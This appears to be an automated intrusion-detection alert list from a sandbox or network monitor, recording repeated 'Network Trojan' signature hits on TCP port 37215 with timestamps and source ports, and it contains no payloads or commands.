                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.473474
                  SID:2835222
                  Source Port:56782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.932458
                  SID:2835222
                  Source Port:41142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281548
                  SID:2835222
                  Source Port:42318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.791681
                  SID:2829579
                  Source Port:45886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933430
                  SID:2829579
                  Source Port:37194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.521887
                  SID:2829579
                  Source Port:44538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.534409
                  SID:2829579
                  Source Port:36798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.019850
                  SID:2835222
                  Source Port:38836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.150804
                  SID:2829579
                  Source Port:40914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.879483
                  SID:2835222
                  Source Port:59128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2829579
                  Source Port:40240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.741035
                  SID:2835222
                  Source Port:54342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.762631
                  SID:2835222
                  Source Port:36014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981965
                  SID:2829579
                  Source Port:46944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828084
                  SID:2835222
                  Source Port:32990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.411489
                  SID:2829579
                  Source Port:48984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.920818
                  SID:2835222
                  Source Port:58208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.632510
                  SID:2829579
                  Source Port:56634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522162
                  SID:2829579
                  Source Port:56262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.408292
                  SID:2835222
                  Source Port:55682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529437
                  SID:2829579
                  Source Port:44756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.451550
                  SID:2835222
                  Source Port:35986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830760
                  SID:2829579
                  Source Port:52390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.662574
                  SID:2835222
                  Source Port:39208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926314
                  SID:2829579
                  Source Port:41610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.182611
                  SID:2835222
                  Source Port:34346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.786182
                  SID:2829579
                  Source Port:35164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174460
                  SID:2829579
                  Source Port:41270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896647
                  SID:2835222
                  Source Port:37846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856706
                  SID:2829579
                  Source Port:57822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.471512
                  SID:2829579
                  Source Port:41966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.526771
                  SID:2835222
                  Source Port:35160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.437179
                  SID:2835222
                  Source Port:35540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.451424
                  SID:2829579
                  Source Port:32912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.532484
                  SID:2835222
                  Source Port:33984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.668883
                  SID:2835222
                  Source Port:37722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824787
                  SID:2829579
                  Source Port:60408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.803145
                  SID:2829579
                  Source Port:52624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.173091
                  SID:2829579
                  Source Port:40278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609606
                  SID:2829579
                  Source Port:38648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.561465
                  SID:2829579
                  Source Port:37540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867068
                  SID:2829579
                  Source Port:56722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.960934
                  SID:2829579
                  Source Port:46278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.467844
                  SID:2829579
                  Source Port:52816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164173
                  SID:2829579
                  Source Port:39162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.020441
                  SID:2835222
                  Source Port:40056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.559521
                  SID:2835222
                  Source Port:51812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.400738
                  SID:2835222
                  Source Port:49546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.121726
                  SID:2829579
                  Source Port:58674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432411
                  SID:2829579
                  Source Port:59914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776398
                  SID:2829579
                  Source Port:58142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985127
                  SID:2829579
                  Source Port:39668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850871
                  SID:2835222
                  Source Port:38058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.128635
                  SID:2829579
                  Source Port:45410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.611968
                  SID:2829579
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.360027
                  SID:2835222
                  Source Port:42168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865384
                  SID:2829579
                  Source Port:51704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564107
                  SID:2829579
                  Source Port:60278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.169986
                  SID:2829579
                  Source Port:52076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.532227
                  SID:2829579
                  Source Port:55250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460856
                  SID:2829579
                  Source Port:33812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.167666
                  SID:2829579
                  Source Port:39184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.168081
                  SID:2829579
                  Source Port:33152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.837168
                  SID:2835222
                  Source Port:50670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.276470
                  SID:2829579
                  Source Port:36440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437126
                  SID:2829579
                  Source Port:48572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941033
                  SID:2829579
                  Source Port:55904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.686618
                  SID:2829579
                  Source Port:53972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2829579
                  Source Port:49754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.509281
                  SID:2829579
                  Source Port:40516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.441172
                  SID:2835222
                  Source Port:41744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069950
                  SID:2829579
                  Source Port:33850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.207255
                  SID:2835222
                  Source Port:40656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.841554
                  SID:2835222
                  Source Port:44330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.877616
                  SID:2829579
                  Source Port:36822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.376308
                  SID:2835222
                  Source Port:42162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.999763
                  SID:2829579
                  Source Port:54240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529436
                  SID:2835222
                  Source Port:35672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.147730
                  SID:2835222
                  Source Port:53282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.949660
                  SID:2829579
                  Source Port:49094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.808477
                  SID:2829579
                  Source Port:42982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564607
                  SID:2835222
                  Source Port:53040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373300
                  SID:2835222
                  Source Port:45566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.283818
                  SID:2829579
                  Source Port:36714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.607530
                  SID:2835222
                  Source Port:56348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.986495
                  SID:2829579
                  Source Port:53600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912648
                  SID:2835222
                  Source Port:58364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846444
                  SID:2835222
                  Source Port:43192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.072546
                  SID:2835222
                  Source Port:37302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.831924
                  SID:2835222
                  Source Port:47654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019292
                  SID:2829579
                  Source Port:56076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.603648
                  SID:2829579
                  Source Port:53924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.545208
                  SID:2835222
                  Source Port:33540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.659206
                  SID:2835222
                  Source Port:56434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177795
                  SID:2829579
                  Source Port:50326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.568128
                  SID:2829579
                  Source Port:35200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.264327
                  SID:2835222
                  Source Port:53784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260585
                  SID:2835222
                  Source Port:58986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357505
                  SID:2829579
                  Source Port:54446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.594883
                  SID:2835222
                  Source Port:37214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640605
                  SID:2835222
                  Source Port:46788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2829579
                  Source Port:58410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.956739
                  SID:2835222
                  Source Port:41090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.641864
                  SID:2829579
                  Source Port:47724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846444
                  SID:2835222
                  Source Port:42010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.580773
                  SID:2829579
                  Source Port:56024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.861604
                  SID:2835222
                  Source Port:51600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.008672
                  SID:2829579
                  Source Port:56114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383981
                  SID:2829579
                  Source Port:40290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2829579
                  Source Port:52578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.151142
                  SID:2829579
                  Source Port:35136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.549602
                  SID:2835222
                  Source Port:39532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.531286
                  SID:2829579
                  Source Port:45672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.283034
                  SID:2829579
                  Source Port:35716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305331
                  SID:2829579
                  Source Port:59526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752339
                  SID:2835222
                  Source Port:37734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.867570
                  SID:2829579
                  Source Port:54302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.786219
                  SID:2835222
                  Source Port:43100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156575
                  SID:2835222
                  Source Port:51604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026177
                  SID:2829579
                  Source Port:60362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.277665
                  SID:2835222
                  Source Port:32866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.458105
                  SID:2835222
                  Source Port:38606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.921196
                  SID:2835222
                  Source Port:40866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.124303
                  SID:2829579
                  Source Port:35792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.757795
                  SID:2829579
                  Source Port:40658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128612
                  SID:2829579
                  Source Port:46370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.925849
                  SID:2835222
                  Source Port:40400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2835222
                  Source Port:56480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.220771
                  SID:2835222
                  Source Port:48834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.562470
                  SID:2829579
                  Source Port:59456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.656959
                  SID:2829579
                  Source Port:41436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.083283
                  SID:2835222
                  Source Port:50458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655125
                  SID:2829579
                  Source Port:50020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2829579
                  Source Port:33228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926953
                  SID:2835222
                  Source Port:60376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.781725
                  SID:2835222
                  Source Port:48550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499192
                  SID:2829579
                  Source Port:41846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702209
                  SID:2829579
                  Source Port:54276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488786
                  SID:2829579
                  Source Port:46476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.499303
                  SID:2835222
                  Source Port:44016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.055063
                  SID:2829579
                  Source Port:40314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.153335
                  SID:2829579
                  Source Port:36928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.844972
                  SID:2829579
                  Source Port:43446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.878190
                  SID:2829579
                  Source Port:43158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.664680
                  SID:2829579
                  Source Port:54638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.514336
                  SID:2829579
                  Source Port:51766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828351
                  SID:2829579
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198978
                  SID:2829579
                  Source Port:47540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.645172
                  SID:2835222
                  Source Port:59484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.589952
                  SID:2835222
                  Source Port:39406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854210
                  SID:2829579
                  Source Port:34682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772841
                  SID:2835222
                  Source Port:37190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.627693
                  SID:2835222
                  Source Port:36758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2829579
                  Source Port:47118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650835
                  SID:2829579
                  Source Port:46922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.871003
                  SID:2835222
                  Source Port:43738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.350544
                  SID:2835222
                  Source Port:47720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.966611
                  SID:2835222
                  Source Port:42160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.478672
                  SID:2829579
                  Source Port:36096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.413820
                  SID:2835222
                  Source Port:51206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.350346
                  SID:2835222
                  Source Port:39310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654804
                  SID:2835222
                  Source Port:55970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.576586
                  SID:2829579
                  Source Port:36964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.468453
                  SID:2829579
                  Source Port:37132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.852225
                  SID:2835222
                  Source Port:60626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.839677
                  SID:2835222
                  Source Port:43078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.554778
                  SID:2835222
                  Source Port:59720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.432680
                  SID:2835222
                  Source Port:45370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.215943
                  SID:2835222
                  Source Port:56428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.617966
                  SID:2829579
                  Source Port:36866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169608
                  SID:2835222
                  Source Port:57450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.575874
                  SID:2835222
                  Source Port:56904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.736564
                  SID:2829579
                  Source Port:50576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587854
                  SID:2835222
                  Source Port:39412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619051
                  SID:2835222
                  Source Port:49188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.790493
                  SID:2829579
                  Source Port:42128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425072
                  SID:2829579
                  Source Port:35244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996643
                  SID:2829579
                  Source Port:49212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.145425
                  SID:2835222
                  Source Port:37770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.250485
                  SID:2835222
                  Source Port:49326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.667979
                  SID:2835222
                  Source Port:46696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.183998
                  SID:2835222
                  Source Port:43290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.352780
                  SID:2829579
                  Source Port:53748
                  Destination Port:37215
